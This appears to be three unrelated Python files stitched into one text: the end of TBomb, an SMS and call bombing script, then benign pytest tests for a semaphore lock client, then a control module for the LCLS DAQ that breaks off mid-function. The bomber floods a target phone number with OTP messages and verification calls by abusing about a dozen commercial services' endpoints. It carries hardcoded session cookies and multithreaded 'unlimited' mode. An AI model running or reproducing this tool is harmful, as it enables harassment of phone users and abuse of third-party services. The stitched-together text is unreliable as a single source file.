'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {"country_code":cc,"phone_number":pn}
response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
rd=response.text
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
cookies = {
'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
'frontend_cid': '8zqBBzwQTMIt9UKg',
'_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
'G_ENABLED_IDPS': 'google',
}
headers = {
'Host': 'www.aala.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'https://www.aala.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.aala.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
}
data = {
'email': cc+pn,
'firstname': 'SpeedX',
'lastname': 'SpeedX'
}
response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
return rd.find('code:') != -1
elif lim == 16:
data = {
'method': 'SMS',
'countryCode': 'id',
'phoneNumber': cc+pn,
'templateID': 'pax_android_production'
}
response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
test_lock.py | """Test the clients `lock` interface."""
from datetime import timedelta
from tempfile import NamedTemporaryFile
from threading import Thread
from time import sleep
import pytest # type: ignore
from throttle_client import Client, heartbeat, Peer, Timeout, lock
from . import BASE_URL, cargo_main, throttle_client
def test_error_on_leasing_unknown_semaphore():
"""
Verify what error we receive than acquiring a semaphore for a ressource
unknown to the server.
"""
with throttle_client(b"[semaphores]") as client:
with pytest.raises(Exception, match=r"Unknown semaphore"):
with lock(client, "Unknown"):
pass
def test_remainder():
"""
Verify that we can acquire a lock to semaphore and release it
"""
with throttle_client(b"[semaphores]\nA=1") as client:
assert 1 == client.remainder("A")
with lock(client, "A"):
assert 0 == client.remainder("A")
assert 1 == client.remainder("A")
def test_multiple_semaphores_remainder():
"""
Verify that we can acquire and release locks to different semaphores
"""
with throttle_client(b"[semaphores]\nA=1\nB=1\nC=1") as client:
with lock(client, "A"):
assert 0 == client.remainder("A")
with lock(client, "B"):
assert 0 == client.remainder("B")
with lock(client, "C"):
assert 0 == client.remainder("C")
assert 1 == client.remainder("A")
assert 1 == client.remainder("B")
assert 1 == client.remainder("C")
def test_server_recovers_pending_lock_after_state_loss():
"""
Verify pending leases recover from server state loss and are acquired after reboot.
"""
acquired_lease = False
def acquire_lease_concurrent(client):
with lock(client, "A", timeout=timedelta(seconds=10)):
nonlocal acquired_lease
acquired_lease = True
with NamedTemporaryFile(delete=False) as cfg:
cfg.write(b"[semaphores]\nA=1")
cfg.close()
client = Client(BASE_URL)
with cargo_main(cfg=cfg.name) as proc:
first = client.new_peer()
# Acquire first peer
client.acquire(first, "A")
# Acquire second lease
t = Thread(target=acquire_lease_concurrent, args=[client])
t.start()
# Give the acquire request some time to go through, so we hit the edge case
# of getting an 'Unknown peer' response from the server
sleep(4)
proc.kill()
# Invoking this context manager anew terminates and restarts the server. I.e.
# it's losing all its state. Note that we started the thread t within the old
# context and join the pending lease in the new one.
with cargo_main(cfg=cfg.name):
# Instead of releasing the first lease, we restarted the server. We don't
# have a heartbeat for the first lease, so semaphore should be taken by the
# lease acquired in thread t, if we are able to recover from server reboot
# during pending leases on the client side.
t.join()
assert acquired_lease
def test_keep_lease_alive_beyond_expiration():
"""
Validates that a heartbeat keeps the lease alive beyond the initial
expiration time.
"""
with throttle_client(b"[semaphores]\nA=1") as client:
client.expiration_time = timedelta(seconds=1)
with lock(client, "A", heartbeat_interval=timedelta(seconds=0)) as _:
sleep(1.5)
# Evens though enough time has passed, our lease should not be
# expired, thanks to the heartbeat.
assert client.remove_expired() == 0
def test_litter_collection():
"""
Verify that leases don't leak thanks to litter collection
"""
with throttle_client(
(b'litter_collection_interval="10ms"\n' b"[semaphores]\n" b"A=1\n")
) as client:
# Acquire lease, but since we don't use the context manager we never release
# it.
peer = client.new_peer()
client.expiration_time = timedelta(seconds=0.1)
_ = client.acquire(peer, "A")
# No, worry time will take care of this.
sleep(0.2)
assert client.remainder("A") == 1
def test_lock_count_larger_one():
"""
Assert that locks with a count > 1, decrement the semaphore count accordingly
"""
with throttle_client(b"[semaphores]\nA=5") as client:
with lock(client, "A", count=3):
assert client.remainder("A") == 2
assert client.remainder("A") == 5
def test_lock_count_larger_pends_if_count_is_not_high_enough():
"""
Assert that we do not overspend an semaphore using lock counts > 1. Even if the
semaphore count is > 0.
"""
with throttle_client(b"[semaphores]\nA=5") as client:
one = client.new_peer()
two = client.new_peer()
_ = client.acquire(one, "A", count=3)
assert not client.acquire(two, "A", count=3)
def test_exception():
"""
Assert that lock is freed in the presence of exceptions in the client code
"""
with throttle_client(b"[semaphores]\nA=1") as client:
try:
with lock(client, "A"):
raise Exception()
except Exception:
assert client.remainder("A") == 1
def test_lock_count_larger_than_full_count():
"""
Assert that exception is raised, rather than accepting a lock which would pend
forever.
"""
with throttle_client(b"[semaphores]\nA=1") as client:
with pytest.raises(ValueError, match="block forever"):
peer = client.new_peer()
client.acquire(peer, "A", count=2)
def test_try_lock():
"""
Assert that a call to lock raises Timout Exception if pending to long
"""
with throttle_client(b"[semaphores]\nA=1") as client:
# We hold the lease, all following calls are going to block
first = client.new_peer()
client.acquire(first, "A")
with pytest.raises(Timeout):
with lock(client, "A", timeout=timedelta(seconds=1)):
pass
def test_recover_from_unknown_peer_during_acquisition_lock():
"""
The lock interface must recreate the peer if it is removed from the server, between
`new_peer` and acquire.
"""
acquired_lease = False
def acquire_lease_concurrent(client):
with lock(client, "A", timeout=timedelta(seconds=10)):
nonlocal acquired_lease
acquired_lease = True
# Trigger `UnknownPeer` using litter collection. Let the peer expire really fast
with throttle_client(
b'litter_collection_interval="10ms"\n' b"[semaphores]\nA=1"
) as client:
# Next peer should expire immediatly
client.expiration_time = timedelta(seconds=0)
t = Thread(target=acquire_lease_concurrent, args=[client])
t.start()
# Give `new_peer` some time to go through, so we hit the edge case of getting an
# 'Unknown peer' response from the server during `acquire`.
sleep(2)
client.expiration_time = timedelta(minutes=5)
t.join(timeout=10)
assert acquired_lease
def test_peer_recovery_after_server_reboot():
"""
Heartbeat must restore peers, after server reboot.
"""
# Server is shutdown. Boot a new one wich does not know about this peer
with throttle_client(b"[semaphores]\nA=1") as client:
# Bogus peer id. Presumably from a peer created before the server reboot.
peer = Peer(42, client, {"A": 1})
with heartbeat(peer, interval=timedelta(milliseconds=10)):
# Wait for heartbeat and restore, to go through
sleep(2)
# Which implies the remainder of A being 0
assert client.remainder("A") == 0
def test_nested_locks():
"""
Nested locks should be well behaved
"""
with throttle_client(b"[semaphores]\nA=1\nB=1") as client:
with lock(client, "A") as peer:
assert client.remainder("A") == 0
assert client.remainder("B") == 1
with lock(client, "B", peer=peer):
assert client.remainder("A") == 0
assert client.remainder("B") == 0
assert client.remainder("A") == 0
assert client.remainder("B") == 1
assert client.remainder("A") == 1
assert client.remainder("B") == 1
def test_multiple_peer_recovery_after_server_reboot():
"""
Heartbeat must restore all locks for a peer, after server reboot.
"""
# Server is shutdown. Boot a new one wich does not know about the peers
with throttle_client(b"[semaphores]\nA=1\nB=1\nC=1") as client:
# Bogus peer id. Presumably from a peer created before the server reboot.
peer = Peer(42, client, {"A": 1, "B": 1, "C": 1})
with heartbeat(peer, interval=timedelta(milliseconds=10)):
# Wait for heartbeat and restore, to go through
sleep(2)
# Which implies the remainder of A, B, C being 0
assert client.remainder("A") == 0
assert client.remainder("B") == 0
assert client.remainder("C") == 0
|
daq.py | """
This module defines a control interface for the LCLS1 DAQ.
"""
import enum
import functools
import logging
import os
import time
import threading
from importlib import import_module
from ophyd.status import Status
from ophyd.utils import StatusTimeoutError, WaitTimeoutError
from . import ext_scripts
from .ami import set_pyami_filter, set_monitor_det
logger = logging.getLogger(__name__)
pydaq = None
# Wait up to this many seconds for daq to be ready for a begin call
BEGIN_TIMEOUT = 15
# Do not allow begins within this many seconds of a stop
BEGIN_THROTTLE = 1
# Not-None sentinal for default value when None has a special meaning
# Indicates that the last configured value should be used
_CONFIG_VAL = object()
def check_connect(f):
"""
Decorator to ensure that the `Daq` is connected before running a method.
"""
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
logger.debug('Checking for daq connection')
if not self.connected:
msg = 'DAQ is not connected. Attempting to connect...'
logger.info(msg)
self.connect()
if self.connected:
logger.debug('Daq is connected')
return f(self, *args, **kwargs)
else:
err = 'Could not connect to DAQ'
logger.error(err)
raise RuntimeError(err)
return wrapper
class DaqTimeoutError(Exception):
pass
class Daq:
"""
The LCLS1 daq as a ``bluesky``-compatible object.
This uses the ``pydaq`` module to connect with a running daq instance,
controlling it via socket commands.
It can be used as a ``Reader`` in a ``bluesky`` plan to take data at
discrete scan points.
It can be used as a ``Flyer`` in a ``bluesky`` plan to have the daq start
at the beginning of the run and end at the end of the run.
Unlike normal ``bluesky`` readable devices or flyers, this has no data to
report to the ``RunEngine`` on the ``read`` or ``collect`` calls. No data
will pass into the python layer from the daq.
Parameters
----------
RE: ``RunEngine``, optional
Set ``RE`` to the session's main ``RunEngine``
"""
_state_enum = enum.Enum('PydaqState',
'Disconnected Connected Configured Open Running',
start=0)
default_config = dict(events=None,
duration=None,
use_l3t=False,
record=None,
controls=None,
begin_sleep=0)
name = 'daq'
parent = None
def __init__(self, RE=None):
if pydaq is None:
globals()['pydaq'] = import_module('pydaq')
super().__init__()
self._control = None
self._config = None
self._desired_config = {}
self._reset_begin()
self._host = os.uname()[1]
self._RE = RE
self._re_cbid = None
self._config_ts = {}
self._update_config_ts()
self._pre_run_state = None
self._last_stop = 0
self._check_run_number_has_failed = False
register_daq(self)
# Convenience properties
@property
def connected(self):
"""
``True`` if the daq is connected, ``False`` otherwise.
"""
return self._control is not None
@property
def configured(self):
"""
``True`` if the daq is configured, ``False`` otherwise.
"""
return self._config is not None
@property
def config(self):
"""
The current configuration, e.g. the last call to `configure`
"""
if self.configured:
return self._config.copy()
else:
return self.default_config.copy()
@property
def next_config(self):
"""
The next queued configuration.
This can be different than `config` if we have queued up a
configuration to be run on the next begin.
"""
cfg = self.config
cfg.update(self._desired_config)
return cfg
@property
def state(self):
"""
State as reported by the daq. Can be any of the following:
- ``Disconnected``: No active session in python
- ``Connected``: Active session in python
- ``Configured``: Connected, and the daq has been configured
- ``Open``: We are in the middle of a run
- ``Running``: We are collecting data in a run
"""
if self.connected:
logger.debug('calling Daq.control.state()')
num = self._control.state()
return self._state_enum(num).name
else:
return 'Disconnected'
# Interactive methods
def connect(self):
"""
Connect to the live DAQ, giving full control to the Python process.
To undo this, you may call `disconnect`.
"""
logger.debug('Daq.connect()')
err = False
conn = False
if self._control is None:
for plat in range(6):
try:
logger.debug(('instantiate Daq.control '
'= pydaq.Control(%s, %s)'),
self._host, plat)
self._control = pydaq.Control(self._host, platform=plat)
logger.debug('Daq.control.connect()')
self._control.connect()
logger.info('Connected to DAQ')
conn = True
break
except Exception as exc:
if 'query' in str(exc):
err = True
logger.error(('Failed to connect: DAQ is not '
'allocated!'))
if not (err or conn):
err = True
logger.error(('Failed to connect: DAQ is not running on this '
'machine, and is not allocated!'))
if err:
logger.debug('del Daq.control')
del self._control
self._control = None
else:
logger.info('Connect requested, but already connected to DAQ')
def disconnect(self):
"""
Disconnect from the live DAQ, giving control back to the GUI.
This is the opposite of `connect`.
"""
logger.debug('Daq.disconnect()')
if self._control is not None:
self.end_run()
self._control.disconnect()
del self._control
self._control = None
self._desired_config = self._config or {}
self._config = None
logger.info('DAQ is disconnected.')
@check_connect
def wait(self, timeout=None):
"""
Pause the thread until the DAQ is done aquiring.
Parameters
----------
timeout: ``float``
Maximum time to wait in seconds.
"""
logger.debug('Daq.wait()')
if self.state == 'Running':
if self._events or self._duration:
status = self._get_end_status()
try:
status.wait(timeout=timeout)
except (StatusTimeoutError, WaitTimeoutError):
msg = (f'Timeout after {timeout} seconds waiting for daq '
'to finish acquiring.')
raise DaqTimeoutError(msg) from None
else:
raise RuntimeError('Cannot wait, daq configured to run '
'forever.')
def begin(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
record=_CONFIG_VAL, use_l3t=_CONFIG_VAL, controls=_CONFIG_VAL,
wait=False, end_run=False):
"""
Start the daq and block until the daq has begun acquiring data.
Optionally block with ``wait=True`` until the daq has finished aquiring
data. If blocking, a ``ctrl+c`` will end the run and clean up.
If omitted, any argument that is shared with `configure`
will fall back to the configured value.
Internally, this calls `kickoff` and manages its ``Status`` object.
Parameters
----------
events: ``int``, optional
Number events to take in the daq.
duration: ``int``, optional
Time to run the daq in seconds, if ``events`` was not provided.
record: ``bool``, optional
If ``True``, we'll configure the daq to record data before this
run.
use_l3t: ``bool``, optional
If ``True``, we'll run with the level 3 trigger. This means that
if we specified a number of events, we will wait for that many
"good" events as determined by the daq.
controls: ``dict{name: device}`` or ``list[device...]``, optional
If provided, values from these will make it into the DAQ data
stream as variables. We will check ``device.position`` and
``device.value`` for quantities to use and we will update these
values each time begin is called. To provide a list, all devices
must have a ``name`` attribute.
wait: ``bool``, optional
If ``True``, wait for the daq to finish aquiring data. A
``KeyboardInterrupt`` (``ctrl+c``) during this wait will end the
run and clean up.
end_run: ``bool``, optional
If ``True``, we'll end the run after the daq has stopped.
"""
logger.debug(('Daq.begin(events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, wait=%s)'),
events, duration, record, use_l3t, controls, wait)
try:
if record is not _CONFIG_VAL and record != self.record:
old_record = self.record
self.preconfig(record=record, show_queued_cfg=False)
begin_status = self.kickoff(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
try:
begin_status.wait(timeout=self._begin_timeout)
except (StatusTimeoutError, WaitTimeoutError):
msg = (f'Timeout after {self._begin_timeout} seconds waiting '
'for daq to begin.')
raise DaqTimeoutError(msg) from None
# In some daq configurations the begin status returns very early,
# so we allow the user to configure an emperically derived extra
# sleep.
time.sleep(self.config['begin_sleep'])
if wait:
self.wait()
if end_run:
self.end_run()
if end_run and not wait:
threading.Thread(target=self._ender_thread, args=()).start()
except KeyboardInterrupt:
self.end_run()
logger.info('%s.begin interrupted, ending run', self.name)
finally:
try:
self.preconfig(record=old_record, show_queued_cfg=False)
except NameError:
pass
@property
def _begin_timeout(self):
return BEGIN_TIMEOUT + BEGIN_THROTTLE
def begin_infinite(self, record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
controls=_CONFIG_VAL):
"""
Start the daq to run forever in the background.
"""
self.begin(events=0, record=record, use_l3t=use_l3t,
controls=controls, wait=False, end_run=False)
def _ender_thread(self):
"""
End the run when the daq stops aquiring
"""
self.wait()
self.end_run()
@check_connect
def stop(self):
"""
Stop the current acquisition, ending it early.
"""
logger.debug('Daq.stop()')
self._control.stop()
self._reset_begin()
self._last_stop = time.time()
@check_connect
def end_run(self):
"""
Call `stop`, then mark the run as finished.
"""
logger.debug('Daq.end_run()')
self.stop()
self._control.endrun()
# Reader interface
@check_connect
def trigger(self):
"""
Begin acquisition. This method blocks until the run begins.
Returns a status object that will be marked done when the daq has
stopped acquiring.
This will raise a RuntimeError if the daq was never configured for
events or duration.
Returns
-------
done_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
cfg = self.next_config
if all(cfg[key] is None for key in ('events', 'duration')):
raise RuntimeError('Cannot start daq in scan step, did not '
'configure events or duration.')
self.begin()
return self._get_end_status()
def read(self):
"""
Return data. There is no data implemented yet.
This also stops if running so you can use this device in a bluesky scan
and wait for "everything else" to be done, then stop the daq
afterwards.
"""
if self.state == 'Running':
self.stop()
return {}
def describe(self):
"""
Explain what read returns. There is nothing yet.
"""
return {}
# Flyer interface
@check_connect
def kickoff(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
use_l3t=_CONFIG_VAL, controls=_CONFIG_VAL):
"""
Begin acquisition. This method is non-blocking.
See `begin` for a description of the parameters.
This method does not supply arguments for configuration parameters, it
supplies arguments directly to ``pydaq.Control.begin``. It will
configure before running if there are queued configuration changes.
This is part of the ``bluesky`` ``Flyer`` interface.
Returns
-------
ready_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
logger.debug('Daq.kickoff()')
self._check_duration(duration)
if self._desired_config or not self.configured:
try:
self.configure()
except StateTransitionError:
err = ('Illegal reconfigure with {} during an open run. End '
'the current run with daq.end_run() before running '
'with a new configuration'.format(self._desired_config))
logger.debug(err, exc_info=True)
raise StateTransitionError(err)
check_run_number = all((self.state == 'Configured',
self.config['record'],
not self._check_run_number_has_failed))
if check_run_number:
try:
prev_run = self.run_number()
next_run = prev_run + 1
except Exception:
logger.debug('Error getting run number in kickoff',
exc_info=True)
next_run = None
